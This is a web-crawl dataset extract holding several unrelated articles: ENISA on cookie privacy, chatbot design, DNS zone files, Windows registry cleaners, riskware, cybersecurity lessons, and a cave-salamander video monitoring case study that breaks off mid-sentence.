text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
New types of cookies raise online privacy concerns The advertising industry has led the drive for new, persistent and powerful cookies, with privacy-invasive features for marketing practices and profiling. The EU cyber security Agency ENISA advocates that both the user browser and the origin server must assist informed consent, and that users should be able to easily manage their cookies. A new ENISA paper identifies and analyzes cookies in terms of security vulnerabilities and the relevant privacy concerns. The new type of cookies support user-identification in a persistent manner and do not have enough transparency of how they are being used. Therefore, their security and privacy implications are not easily quantifiable. To mitigate the privacy implications, the Agency recommends, among other things, that: - Users should be able to easily manage cookies: in particular new cookie types. As such, all cookies should have user-friendly removal mechanisms which are easy to understand and use by any user. - Storage of cookies outside browser control should be limited or prohibited. - Users should be provided with another service channel if they do not accept cookies. The Executive Director of ENISA, Prof. Udo Helmbrecht underlines: “Much work is needed to make these next-generation cookies as transparent and user-controlled as regular HTTP cookies, to safeguard the privacy and security aspects of consumers and business alike.”
<urn:uuid:757462f0-8e89-47f6-a6e3-f33c3cc03b1a>
CC-MAIN-2024-38
https://www.helpnetsecurity.com/2011/02/21/new-types-of-cookies-raise-online-privacy-concerns/
2024-09-07T23:43:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00132.warc.gz
en
0.925932
279
2.71875
3
Chatbots have become extraordinarily popular in recent years largely due to technological advances, but not all of them are created equals. From basic button-based bots to NLP-driven conversational chatbots, what differentiate them and most importantly, how can you design a qualitative conversational bot, that’s what we’ll see in this article. What is a conversational chatbot? How does it differ from a regular chatbot? A chatbot is a self-service tool that helps business automate a certain level of responses to frequent customer requests. While chatbots have been around for a while, most of them were button-based and offered limited interaction capabilities. Conversational AI chatbots, on the contrary, are able to understand customers in the natural language they speak or type and suggest the best answer after analyzing the real intent and content of the request. This requires special Natural Language Processing capabilities that are quite advanced and that weren’t available in basic, button-based chatbots. These basic chatbots merely guided users through a predefined funnel, which not always provided the expected path or solution to customers. Different types of chatbots First and foremost, it is important to differentiate the various types of chatbots available in the market. From simple menu/button-based chatbots to conversational AI chatbots, they’re not equals as they can be using different types of technology. So let’s see what are the specificities of each of them. As the name suggests, these chatbots offer the user to choose from several options, presented in the form of menus or buttons. Depending on what the user clicks on, the bot then prompts another set of options for him to choose from and so on. As you can guess, their structure is quite basic and therefore they represent a big bulk of the chatbots out there due to their simplicity. These bots can answer pre-defined questions and can help users navigate through a website or online webstore, thus facilitating their buying journey, but they quickly become ineffective when it comes to solving complex requests involving a lot of variables. Indeed, as soon as the user’s queries don’t fit in the pre-designed journey, this type of chatbot can’t be of any help, which ends up being quite disappointing and frustrating for the user. With this type of chatbots, the user types in a word or a phrase and the bot identifies the keywords in the query. It then uses a basic analysis engine in order to process those keywords and to match them with a pre-loaded response. The advantage with these is that the bot will only reply with content that has been manually loaded into the system, nothing off-topic, thus giving your company good control over your brand’s automated messaging. On the other hand, these chatbots are limited by the fact that they are not able to recognize misspelled words or slang. They are also highly contextual and consequently fall short when used outside of their context. Ask the question “book a hotel room” to a chatbot for a bookstore and it will likely return books about hotels. Conversational Chatbots using NLP These are by far the most advanced AI chatbots. They use Artificial Intelligence and Natural Language Processing in order to deliver the best experience possible to the user. Thanks to these technologies, the bot considers the different words that form the sentence, analyzes them as well as any available context in order to get a contextual understanding of a question. It can then apply that understanding towards the resolution of the query. The main advantage of conversational chatbots using NLP is that they understand the meaning behind the words, which also means that they are even able to understand questions with misspellings, thus providing a great user experience. Conversational chatbots’ various level of answers But even if you’re planning on deploying, or already using, a chatbot using conversational AI technology, your bot can reach different “levels” of conversation. Let’s take a specific case as an example and explain what these different stages look like. Let’s say your company has developed an NLP conversational chatbot that is used internally in order to answer employees’ questions about various Human Resources matters. A team member would like to know how many days of annual leave he has left and he asks the chatbot. The first level of answer consists in telling the employee where he can find that information, typically on his payslip or on HR software. This is the most simple and basic level of conversation that can be reached pretty easily when deploying a conversational chatbot. The second level of answer is slightly more evolved as the bot can redirect the employee to a specific internal system, like HR software in this case, where he’ll be able to find how many days of annual leave he still has owing. Finally the third level of answer, which is much more advanced, allows the chatbot to automatically and seamlessly log the employee onto the HR software in order for him to directly access the information he needs. The bot can even prompt the employee to request some annual leave via a calendar or a form, without having to leave the chat platform. This stage obviously implies that the conversational chatbot can integrate with third parties platforms or softwares in order to be able to retrieve the information into another system. That’s one of the technological prerequisites for the bot to offer this type of interaction and service. How to design a good conversational chatbot Having a conversational chatbot using NLP technology is a very good start that will give your company a definite competitive advantage, but you also have to ensure that the interactions with your bot are qualitative and enticing for your users. So how do you design a bot that people will love talking to? Here are some tips and best practices to guide you in this delicate task. A script for transactional queries As the name suggests, a chatbot script is a scenario used in order to pre-plan conversational messages as a response to a user’s query. Keep in mind that not all queries will need a script: simple FAQ type of questions will be answered with a one-off response, but transactional queries will require a script. Indeed the bot has to follow a specific conversational flow in order to gather the details needed to provide a specific information such as a quote for example. The script will obviously vary depending on the chatbot’s goals and the buyer journey, but keep in mind the following best practices when writing a script: - Stay focused on the chatbot’s goals - Keep messages short and simple - Be as clear as possible in what you convey No matter the goal of your conversational chatbot, you have to ensure that people understand it. This means that every response given by the bot must be clear and free of any ambiguity that could lead to misinterpretation. While it can seem quite obvious, too many companies or Botmasters forget about this one and simple rule. It results in a conversational interface that is more confusing than helpful, which completely defeats its purpose. But in addition to writing a clear and unambiguous script, you must also keep your bot’s answers as short and concise as possible. And the reason for this is quite simple: the more there is to read, the higher the chances of people getting confused, tired and distracted. No matter how meticulous your writing is. A good way to achieve this is to break the dialogue up, ie dividing your messages into smaller chunks. Personality is the flavor of your bot. Indeed, you have to define what kind of personality you want your conversational chatbot to have in order to determine its tone of voice, what kind of language it will use, its communication style, etc. But crafting a likeable character is a tricky balancing act. Give it too little personality and the interaction feels dull. Overdo it and it quickly becomes annoying… You get it, crafting a quality conversational chatbot is not an easy task, but we hope that these tips and best practices will be of help when it comes to deploying your very own bot.
<urn:uuid:0a9d13ef-929a-4f34-9698-dece38d8c29b>
CC-MAIN-2024-38
https://www.inbenta.com/articles/what-makes-a-chatbot-conversational/
2024-09-08T00:01:20Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00132.warc.gz
en
0.950525
1,688
2.671875
3
Riskware – a thin line between benign and malicious programs Programming is something that can be used for good and also for bad reasons. We can write software with the sole purpose of causing harm, or we can be developers whose aim is to make things better and easier. Nowadays we can hear a lot about the first ones, the malware, but what about riskware? What is riskware at all? There are some legitimate computer programs which can act as malware and cause damage if they are used by bad guys. It’s like a gun. It matters who holds it and why. A gun is very dangerous in a killer’s hand, but it’s an effective tool to a policeman who’d like to keep the peace. Just an easily understandable example of a riskware: remote administration programs. Benign program: if there’s a problem on a customer’s computer, sysadmins and helpdesks can easily find out what’s the problem with the help of this software and it makes the resolving process faster and easier. Malware: if this program is installed on your computer without your knowledge, the bad guys will have remote access to your computer and do whatever they want without even infecting the software itself. Classification of Riskware Spyware is a legal „information stealer”. It collects information and forwards it to a third party member - mostly without your knowledge. This type of software is packaged as a commercial software because those are buying and using it, who have physical access to or own the computer. Some example: Parents who’d like to monitor their child’s activity In an office, where the employee’s activity is monitored Schools, where the teachers can see what the students doing are It’s OK if the user is aware of the appearance of the spyware on the computer and his/her browsing is captured. But as soon as it is used for collecting data such as passwords, credit card numbers, PIN numbers, email addresses, etc, for malicious purposes, we cannot say it’s a legitimate program anymore. If we want to exit from a website, we can usually see a pop up that’s saying: „Hey, don’t go, here’s a 50% voucher”. Or if you’d like to buy a new mobile phone and check it on a website, you’ll see that phone’s (or its accessories’) advertisement almost everywhere on the web. Adware is behind all of these. It is a program which tracks the browsing behaviour and uses the collected information for marketing purposes for example delivering custom advertisement (e.g. exit intent pop up) to you. It’s not necessarily harmful, however it has the potential to be. If a large number of popup ads appear in a user's browser, they can disrupt their work or entertainment, slow down the computer’s performance and it can crash the entire system. There’s another way, how Adware can be used for malicious reasons. It can redirect us to an unsafe site (e.g. phishing site) and/or shows us advertisements which contains Trojan virus or Spyware. 3. Hacker tools Let’s think of Nmap. System administrators can use it for mapping the network, searching for vulnerabilities, finding unauthorized servers in the network, scanning open ports, etc. But on the other hand, of course it can be a weapon for the black hat hackers. Those system admin tools which are used for causing harm are called hacker tools. By utilizing them, they can gain unauthorized access. A well-known hacker tool is the port scanner which helps the hackers finding vulnerable point on your server. It’s like someone saying an insulting joke to you. If you get it, there’s no problem, but if you don’t realise that it’s just a joke, you can feel yourself really bad. There are some programs which were created just for fun, but the effect on the user can be dangerous. For example, it can display messages and the user can believe that their computer is destroyed so they decide to format the hard drive. If it happens with a critical system or if the drive contains important data, the effects can be significant. Microsoft Sysinternal’s Blue Screen of Death screensaver is a riskware, too. Someone can believe that it’s real, so the sysadmin will reboot the server. An unnecessary reboot can cause damage on the server. Don’t be the victim of riskware! BitNinja can identify malicious attempts and our modules (mostly the WAF , Malware Detection and Port Honeypot ) offer proactive protection against suspicious riskware. Also, if you download a software or a file, make sure it’s from a reputable website and read the Terms and Service Agreement. Source: Christopher C. Elisan - Malware, Rootkits & Botnets A Beginner's Guide
<urn:uuid:69e71126-04ff-4c6a-b13a-4aef01050208>
CC-MAIN-2024-38
https://bitninja.com/blog/riskware-thin-line-between-benign-and-malicious-programs/
2024-09-10T06:38:08Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00832.warc.gz
en
0.91964
1,057
2.921875
3
The word “cyber” isn’t as intimidating as others claim. To keep it simple, here are the cybersecurity lessons that life taught us. Quit passing the buck. Cybersecurity is not just for the big players like IT professionals, governments, or banks. All of us are responsible for practicing cybersecurity. Almost everyone connects to the Internet. Hence, it is our duty to protect our society and family from the threats that the digital age brings. Know your worth. Cybercriminals commit data breaches because they want something from you – and it is not just the money. They also want sensitive information. Thus, your data is valuable so you must identify where it is. Moreover, you should know how to store it and who to trust with it. You and your data are worth way more than a free game offered on your favorite social media platform. Know your audience. Cybersecurity awareness training is crucial in data protection. If you are tasked to teach someone about its importance, whether it is an employee or a loved one, don’t focus on why it matters to you. Instead, you must explain why it should matter to them. Personalize the way you teach and help them understand the consequences of negligence in protecting data. Moreover, inspire them by letting them know that awareness goes a long way in making a difference. Tidy up after yourself. One of the cybersecurity lessons is don’t assume that hackers won’t want your data just because you don’t need it anymore. Make sure you properly destroy any sensitive information sitting somewhere that you don’t need. Criminals can’t steal what’s not there. Don’t blame the victim. Cybersecurity lessons teach us that there is nothing good in victim shaming and making fun of those who clicked the wrong link or went to the wrong website. Victim shaming creates a culture of fear and humiliation that discourages open dialogue. Hence, this may result in victims not reporting suspected breaches due to embarrassment or fear of punishment, which will only make matters worse. Keep in mind that anyone can be a victim of data breaches, even the most secure organizations. Even the CIA fell victim to data breaches. Hope for the best, but prepare for the worst. “Getting breached is no longer a question of if. It is a question of when.” That may sound cliché and a bit overdramatic. However, considering all the stories about cybersecurity breaches, it is absolutely not a bad idea to prepare for a cyberattack. In other words, prepare for a cybercrime if you want cybersecurity. This means knowing how to properly detect a breach, how to respond to it, and how to recover from it. It’s not about the destination; it’s about the journey. Cybersecurity never stops. It is an ongoing journey we need to constantly strive to achieve. Hence, you must continuously evaluate risks within your organization using the NIST Cybersecurity Framework as a guide. Keep it simple. Before you worry about all the overly complicated and technical cybersecurity jargon out there, start by understanding what it means to have a secure mindset.
<urn:uuid:8920a7e0-afeb-4dec-955d-6173bcc5c6ea>
CC-MAIN-2024-38
https://www.ciso-portal.com/cybersecurity-lessons-learned-from-life/
2024-09-10T06:24:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00832.warc.gz
en
0.948766
662
3.078125
3
Definition of Zone File (DNS) in Network Encyclopedia. What is Zone File? Zone File is a file on a name server that contains information that defines the zone that the name server manages. The zone file is a text file consisting of a series of resource records that form the Domain Name System (DNS) database of the name server. These records identify which name server is responsible for a given zone, timing parameters for zone transfers between name servers, IP address to hostname mappings for hosts within the domains over which the zone file is authoritative, and so on. A typical zone file might look something like this: ; Database file microsoft.com.dns for microsoft.com. @ IN SOA dns1.microsoft.com. admin.microsoft.com.( 12 ; serial number 3600 ; refresh 600 ; retry 86400 ; expire 3600 ) ; minimum TTL ; Zone NS records @ IN NS dns1 @ IN NS dns2 ; Zone A records dns1 IN A 18.104.22.168 dns2 IN A 22.214.171.124 proxy1 IN A 126.96.36.199 fred IN A 188.8.131.52 wilma IN A 184.108.40.206 localhost IN A 127.0.0.1 www IN CNAME fred ftp IN CNAME wilma On Microsoft Windows NT–based and Windows 2000–based servers running the DNS Server services (and hence configured to operate as name servers for the network), the names of the zone files are similar to the names of the domains over which they have authority, but they have the .dns extension appended to them. For example, the zone file for the domain microsoft.com would be microsoft.com.dns and would be located in the directory \%SystemRoot%\System32\Dns. A typical DNS server has at least three zone files: - <root_domain>.dns: The forward lookup zone file that is used to resolve hostnames into IP addresses for TCP/IP hosts over which the name server has authority. In the preceding example, the root domain is microsoft.com, so the zone file is microsoft.com.dns. - z.y.x.w.in-addr.arpa: The reverse lookup zone file for the forward lookup zone, which is used to resolve IP addresses into hostnames for TCP/IP hosts over which the name server has authority. In the preceding example, the network ID is 220.127.116.11, so the reverse lookup zone file is 100.250.192.in-addr.arpa.dns. - cache.dns: A standard file that exists on all name servers and contains the hostnames and IP addresses of name servers on the Internet that maintain the root domain of the entire DNS namespace. Windows 2000 gives you the option of integrating DNS with Active Directory. This results in zone data being stored in Active Directory, which has advantages over traditional implementations of DNS in which zone data is stored in text files: - It provides a more efficient mechanism for zone transfers through the domain replication process of Active Directory. This eliminates the chore of manually configuring zone transfers between primary and secondary DNS servers. - It provides additional fault tolerance for the DNS information because all Active Directory integrated zones are primary zones and therefore contain a copy of the zone data. You should generally use the Windows NT administrative tool called DNS Manager to make changes to zone files on a DNS server running on Windows NT rather than modify these files directly by using a text editor such as Notepad. This will prevent errors from finding their way into the DNS database. Similarly, use the DNS console in Windows 2000 to administer the zone files instead of editing them directly.
<urn:uuid:02c77d31-c9a4-4979-9a15-7686ba8ca706>
CC-MAIN-2024-38
https://networkencyclopedia.com/zone-file/
2024-09-19T01:37:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00132.warc.gz
en
0.866676
803
3.9375
4
Advertisements and promotions for registry cleaners are constantly on the Internet trying to convince inexperienced PC users that the registry requires maintenance. Are registry cleaners necessary and what are some of the benefits? A PC registry is a large database that exists on devices running the Windows operating system. The registry contains thousands of entries which are related to programs and applications that run on Windows. If you are a non techie, you may not be aware that a registry exists within your device and therefore, registry maintenance can easily be overlooked. Maintaining the registry in your PC is something that many users are not aware they must do. Many others do not understand what the registry does and its importance to device performance. In this article, we will provide you with a general overview of the Windows registry and why using a good registry cleaner is important. What is a PC Registry? The registry is a database that is exclusive to the Windows operating system and contains entries that are used to run Windows, as well as the programs and applications associated with it. The database is logically designed and organized and controls all PC operations. The registry exists with all installations of Microsoft Windows and acts as a reference for your PC to allow it to retrieve the necessary files it needs to run specific functions and applications. You can think of the registry as a catalog. When you open an application on your PC the operating system uses the catalog as a reference to determine which files are necessary to properly run the application. The catalog stores all of the settings for running programs and applications on your computer. For example, when you try to open a program or application, your PC queries the registry to locate the files and entries. The registry files and entries contain references to values and settings for operating system functions, programs and software applications you have installed, system and hardware settings, user profiles, and much more. Basically, anything that runs on your PC or you install after market is recorded in the registry. Some of the programs and applications have files and entries in common that they share where other files are used exclusively for specific applications. Where the microprocessor is the brain for your PC’s hardware, the registry is the brain for the entire Windows operating system. This means if you are unfamiliar with the registry, a deleted entry or file could potentially render your device useless or cause the operating system to become unstable. Additionally, the increased number of viruses and malware and software that is poorly programmed in a rush to reach market production, this can make your PC’s registry even more vulnerable to corruption. If you do not understand what the registry does and its importance to your device performance, poorly programmed software could compromise your PC just as easily as any type of virus or malware that attaches itself to registry files and entries. Although you can learn how to clean and maintain the registry, you should never attempt to manually modify or delete registry files unless you are absolutely sure you know what you are doing. This is best left to a technician with comprehensive knowledge of the operating system. Additionally, before cleaning or working with the registry in any respect, you should back it up in the event of a mistake. If something goes wrong, you could lose files and entries that are essential to core functions for your PC. Regardless, the registry is constantly being changed as you install and uninstall programs and applications during normal computer use. For this reason, the registry should be maintained and cleaned just like other aspects of your PC including running antivirus and anti-malware scans, defragmenting your hard drive, cleaning up temporary and unused files, and other routine maintenance steps. If you like to know how things work and want to delve a little deeper into understanding the registry, here is an informative tutorial on the Windows PC registry. Signs of Registry Problems If the registry in your Windows PC develops problems, you will begin to experience unexplained events including the following: Sudden Crashes: If there is an error in the registry or a file or entry has become corrupt, this can cause your computer to crash unexpectedly. This is because the file that has become corrupt or broken can cause the operating system to become unstable. Operating system instability leads to system crashes and can easily be corrected with a good registry cleaner. Bluescreen: The presence of a bluescreen can be scary however, in most cases, a bluescreen is the result of errors in your PC’s registry. This is because the program or application you are trying to run does not have the necessary files and entries it needs to function properly. Restarting your PC in Safe Mode by pressing the F8 button at boot will allow you to run a good registry cleaner to clear up any issues with corrupt registry files. Slow Performance: If your PC has been infected with malware, it can attach itself to registry files and entries. As it runs quietly in the background, it drains PC resources resulting in slow performance. Although you may have run an antivirus/anti-malware scan, there is malware that can hide deep within the registry and then reinvent itself the next time you start up your PC. A good registry cleaner will find these files and remove them to place your PC back in proper working order. Problems with Startup or Shut Down: If your PC does not have the files and entries it needs to properly boot up or shut down, you may experience problems in this area. This makes it difficult to reach the Windows screen at startup or may cause problems with system hangups at shutdown. Registry problems can also be exhibited through other unexplained events including software or browser crashes, freeze ups, dropped Internet connections, and other events you never experience under normal circumstances. Causes of Registry Problems When your registry develops problems a good registry cleaner will help you fix the issues and place your PC back into proper working order. To reduce the number of problems that occur, it helps to learn more about the cause of registry problems so you can try to avoid them during routine computer use. Failing to Properly Shut Down Your PC If your PC is not allowed to go through the normal process of shutting down, such as if you press the Power button or suddenly pull the plug, this can damage files and entries in the registry. Your PC is designed to go through a series of processes to power up and power down. If you try to rush this process, this can result in registry problems. Installing and Uninstalling Applications When you install a program or application, the registry files needed to run the program are entered into the registry database. When you uninstall a program, the files are removed from the registry along with the entire application. Whenever you uninstall a program not all of the registry files and entries are removed. Over time and from normal computer use, these files become corrupt, fragmented, and broken which results in registry problems. Using Cheap Quality Software Cheap quality software is commonly referred to as junkware or bloatware and is the unnecessary software that is typically included with your PC at the time of purchase. Cheap quality software is often poorly programmed which can cause registry errors. On the other hand, software that is considered to be high quality is sometimes rushed to market to keep up with the competition. This means the programming is done in a hurry with the errors being reported and fixed after the product has been released on the market. Hence the reason for Windows Updates and other regular updates to any software programs you install. Poor programming can also cause problems with your PC’s registry. Even when you run an anti-malware scan on a regular basis, there are hundreds of new types of malware released on a daily basis. Some of the malware is designed to slip by your protection software and can be inadvertently downloaded on your PC as the result of clicking on a link or other website component or by simply accessing a website. The malware attaches itself to registry files and entries and can often disguise itself as a legitimate program. Even if your malware scanner identifies the threat and removes it, there are files that can be leftover or still hiding in the registry. This is where a good registry can help you completely obliterate the malware from your system. How a Registry Cleaner Works If you have been using your PC for an extended period of time, you may have noticed that it does not perform as well as it did at the time of purchase. This is mainly due to the number of fragmented and misaligned files that develop from routine computer tasks. In order to understand how a registry cleaner works, you can think of your PC in terms of a library. Each software application that has been installed on your PC represents a book in the library. Over a period of time, the book may become misplaced or discarded however, the record still exists. When you use a registry cleaner, the program performs a scan and checks to make sure that all files and entries pertaining to each software application are correct. Any files that are irrelevant, fragmented, or broken are removed. This helps to optimize your PC’s performance and ensures there are no malware files hiding deep within your registry long after a threat has been removed. Additionally, your PC relies on sufficient memory in order to run programs and applications. Over time the memory gets filled up during the process of running software applications. If you do not know how to optimize the memory, the space is wasted with unnecessary data which slows down PC performance. A registry cleaner will help you to optimize the memory by cleaning out unnecessary clutter in your PC’s memory that is just taking up space and nothing more. Here is a visual example of how a registry cleaner works. As you watch the video, keep in mind that we are not necessarily recommending this registry cleaning program and instead, we are using it as an example of how a registry cleaner works. How to Choose a Registry Cleaner Choosing a registry cleaner is an important decision since you are trusting the most critical components of your PC to the program. In this section, we will provide you with the information you need to start researching registry cleaners, in addition to some of the things you should be aware of before choosing to install a registry cleaning application. Compatibility: Look for a registry cleaner that is compatible with your operating system. For example, if you are running Windows 8.1, some of the registry cleaners may only cover operating systems up to Windows 7. Checking for compatibility will help you to avoid wasting time on a registry cleaner that does not work with your PC and prevent you from downloading a program that that may cause problems due to incompatibility. Deep Scan vs. Quick Scan: Some of the registry cleaners offer a complete scan where others will only perform a quick scan. If you are going to get the best results, it is necessary to choose a registry cleaner that can perform a thorough scan. A quick scan will only touch the surface of any problems that exist within the registry. Plus, it may not be able to identify deep seated issues such as malware files hiding in the registry. Backup: Although it is possible to backup the registry within the operating system before running a registry cleaning program, it is better to choose a registry cleaner that performs the backup for you. This is especially important if anything goes wrong during the cleaning process and ensures you can restore your PC if a problem occurs. Automatic Backup: Each time a registry cleaner removes files, it should be capable of restoring those files in the event a file that is essential to the operating system is inadvertently removed. Auto backup provides a way for you to easily restore the files each time after the cleaning process takes place. Automatic Repair: A good registry cleaner will provide you with a way to manually view the files the software found following a scan. This feature is useful to PC technicians and others that understand how the registry works and helps them decide which files should be removed. If you are a PC user that just wants to increase the performance, the registry cleaner should also include a way to automatically repair the problems without requiring you to analyze them. Tech Support: Learn all you can about the technical support offered by the registry cleaner software company. Some of the companies only offer the very minimum support such as email and a knowledgebase. Other companies will provide you with comprehensive tech support around the clock 24/7. The company should also provide you with a free upgrade when it becomes available. Finally, you should invest the time to read the reviews from other customers that have used the product. If you cannot find any information on the company or any feedback on the software, it is best to move on and look for another software program. A Few Words of Caution When Choosing a Registry Cleaner Like any other product, there are high quality registry cleaners and inferior quality ones as well. Registry cleaners are both free and paid with high and low quality products in both categories. This is why it is of critical importance that you do your research thoroughly before downloading one of these programs. For instance, some software products will offer you a free registry cleaner as a bonus which appears at first to sweeten the deal. However, if the registry cleaner is low quality, it can make the problems you are trying to correct worse. What’s more is the registry cleaner may contain malicious files created with the intent of harming your computer or stealing your personal and financial information. Also, many criminals disguise malware behind what looks like a legitimate registry cleaning application. A rogue registry cleaner can accompany another software application as mentioned above or it can make its way into your PC in the form of adware or spyware. The manner in which it enters your PC is typically from the Internet by clicking on website components or downloading freeware, to name a few ways. Once the rogue software is installed on your PC, you will begin to see popups that claim your computer is plagued with registry issues. Generally, this type of program offers to perform a free scan. When the user is tricked into allowing the application to perform a free scan, it pretends to find more problems. If you want the problems fixed, you must enter your credit card number which is then sent to a remote server where the criminal can process your financial information. Meanwhile, the supposed registry cleaner has caused more problems on your PC than you can imagine and the criminal has absconded with your financial information. Remember that any reputable software vendor will not advertise their products by downloading malware on your PC. If this does happen, it is important to run an anti-malware scan and then clean the registry with a legitimate and high quality registry cleaner. The Bottom Line As you do registry cleaner research on the Internet, you will find people that say cleaning the registry is unnecessary and does nothing in terms of improving PC performance. Then you will find others that use a registry cleaner regularly and enjoy hassle free performance without problems with crashes, bluescreens, and freeze ups, as well as startup and shut down issues, and more. Invest the time to do research, read the reviews, and use caution when downloading a registry cleaner, and you should enjoy many years of error free computing.
<urn:uuid:4325c855-a1f7-4f52-8916-8021d81a7ac9>
CC-MAIN-2024-38
https://internet-access-guide.com/why-using-a-registry-cleaner-is-important/
2024-09-20T07:02:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00032.warc.gz
en
0.949754
3,066
2.515625
3
Download document: EN The Tular Cave Laboratory in Slovenia (Jamski laboratorij Tular) was established in 1960 by Marko Aljancic, a biologist specializing in subterranean species, who populated the laboratory with the European cave salamander (Proteus anguinus). The blind amphibian dwells in the subterranean waters endemic to the Dinaric Karst, where groundwater has carved underground limestone caverns. It spans from East Italy through Slovenia, over coastal Croatia to Herzegovina and part of Bosnia. The highly endangered Proteus can live up to 100 years, is the only European cave vertebrate and, at about 10 to 12 inches long, is by far the largest cave animal in the world. Tular is the biggest cave laboratory in Slovenia and one of the few places where the endangered European cave salamander has been successfully bred outside its natural habitat. The laboratory also maintains a colony of an extremely rare dark-pigmented subspecies endemic to Slovenia. The cave laboratory has studied the ecology and behavior of Proteus, primarily its breeding, for more than 50 years. Conditions at the Tular Cave Laboratory include total darkness and near 100 percent humidity. The laboratory maintains 40 Proteus in four large laboratory pools to simulate their natural cave environment, with clay on the bottom and rocks for hiding. Experiments are based on observation and are carefully designed not to harm or stress the animals. The laboratory is a constituent body of Slovenia\'s Cave Biology Society and is led by Gregor Aljancic. A real-time and long-term video monitoring system was needed to observe behavioral experiments and obtain adequate information on Proteus behavior. The system needed to use motion detection to avoid capturing useless video of long periods of Proteus inactivity, and also needed to provide a reasonable balance of video data quantity, quality and required storage capacity. Video cameras needed to capture clear details to provide additional information to help the laboratory design new studies. The system would need to use infrared (IR) light so as not to disturb the animals, who are stressed when their skin senses the visible spectrum of light. Eventually, the system would need to incorporate five to seven cameras that would be permanently mounted and combined into a 24/7 monitoring system accessible over the Internet as the “TularVirtualLab.” From the fall of 2009 to the spring of 2010, the Tular Cave Laboratory searched the market for a video camera to meet its needs, especially the need for high-resolution images. By far, Arecont Vision\'s AV5105DN 5 megapixel camera was the only one to fit the criteria at a reasonable price (the few other alternatives were extremely expensive). The laboratory also preferred a U.S. made product in terms of expected quality and durability in the extreme cave conditions. Video monitoring of Proteus behavior began with shorter behavioral experiments (up to 30 days), with the system removed from the cave once the experiment was finished. Tular Cave Laboratory uses the Arecont Vision AV5105DN 5 megapixel camera equipped with a 4.5-13mm varifocal IR lens and connected to a computer running Arecont Vision AV100 software as the video management system. The camera is mounted directly above the monitored pool (3 to 6 feet away) or experimental aquarium (1 to 3 feet away). Because of high humidity and dripping water, the camera is enclosed in a plastic waterproof housing. The AV100 software provides video recording based on motion detection triggered by the behavior of Proteus. Arecont Vision\'s AV5105DN is a 5 megapixel day/night camera that provides 2,592 x 1,944-pixel images at 9 frames-per-second (fps). Light sensitivity is 0.3 lux at F1.4. The camera uses H.264 (MPEG-4, Part 10) compression to minimize system bandwidth and storage needs. The AV5105DN can also be used at lower megapixel resolutions for various frame rates up to full motion. The camera provides full-motion progressive-scan 1280 x 1024 video at 30fps, 1600 x 1200 video at 24fps or 2048 x 1536 at 15fps. Features include forensic zooming to zero-in and view the details of a recorded image, motion detection and image cropping. The camera\'s day/night version used at the Tular Cave Laboratory includes a motorized infrared (IR) cut filter for superior low light performance. The camera incorporates Arecont Vision\'s MegaVideo® image processing at 80 billion operations per second. The AV5105DN can output multiple image formats, allowing the simultaneous viewing of the full-resolution field-of-view and regions of interest for high-definition forensic zooming. Other components of the system include a universal power adapter, connection to a PC using a standard UTP cable, and a PC placed in the laboratory\'s control room running the AV100 software, serving as a video-image recorder and providing temporary storage. (Wireless transmission was ruled out because it could stress the electroreceptors in the Proteus sensory system). Every two or three days, the data is transferred (via an external hard drive) to a main hard-drive archive installed in a remote location. Illumination is provided by three or four IR LED illuminators of various intensities to expose the entire area equally. High absorption of IR light in the water requires higher illumination for deeper areas. When observing macroscopic details (such as hatching), the AV5105DN is mounted on the video port of a stereo microscope. Gregor Aljancic designed and installed the system. The laboratory plans to install the permanent system by the end of 2011, using five to eight cameras with 24/7 monitoring and tied into an Internet connection to the cave. Remote IR video monitoring via the Internet will minimize the potential negative impact on the animals due to factors such as human presence, noise and radiation from the electronic equipment. The change will also relocate the sensitive electronic equipment from the harsh cave environment to a remote location. A wireless access point will be installed at the entrance of the laboratory. From that point, data will pass throughout the lab on a wired network, with a Power-over-Ethernet (PoE) network switch providing power to each camera. After installation of an Internet connection, the server computer – including the PC and high-capacity hard drives to store additional data – will be moved to a remote facility of the Tular Cave Laboratory. Higher-resolution megapixel images provide more information and clearer details that were not possible with the poor quality of the previous analog system. The megapixel advantage becomes especially obvious when monitoring a large laboratory pool, which requires the camera to be farther away, with the lens set to a wide angle to cover the entire area. On the video, the animals appear “smaller,” but the megapixel camera still provides clear images and allows for digital zooming of moving animals. Advantages related to video management include the ability to precisely adjust the exposure settings using the AV100 software, an improvement over the analog system\'s limitation of adjusting only the iris and focus. Forensic zooming, the ability to enlarge a smaller section of a recorded video image and see additional details, is also an important tool both for online and offline viewing. Viewing videotapes using the previous analog system was time-consuming, and roughly 70 percent of the gathered video showed animals that were not active, representing a huge amount of useless data and a considerable unnecessary cost. Also, it was harder to find events. Since 1998, the laboratory had digitized the video images and used an online video tracking software to analyze the behavior of Proteus. However, digitizing the video further eroded the quality. Also, the system was not efficient in low-light conditions and lacked the necessary detail when observing the whole pool. The use of a megapixel camera minimizes these challenges. The use of a digital system also reduces the cost of archiving data. Instead of recording on expensive video tapes, the transition to a hard-drive archive provides numerous options to optimize available storage capacity. In addition to the direct advantages of megapixel video (image quality, capacity to monitor details, motion detection, etc.), the cameras provide some indirect advantages. Incorporating up-to-date video monitoring technology into the research methodology raises the quality of the research and advances the position of the Tular Cave Laboratory in the scientific community. In addition to providing greater megapixel image quality, the use of remote accessibility will open new possibilities in science and education. To date, the Tular Virtual Lab is believed to have the first 24/7 video system, a tool introduced to the field of subterranean biology that monitors cave life. During a one month 24/7 monitoring test in January 2011, the Arecont Vision camera mounted above one of the laboratory pools captured a Proteus female laying eggs – an extremely rare event that happens only every 8 to 12 years in captivity. Even in the early stages before the system is fully operative, the value of megapixel imaging as a study tool has become obvious. The data collected by the Arecont Vision infrared cameras has already brought urgently needed international attention to the 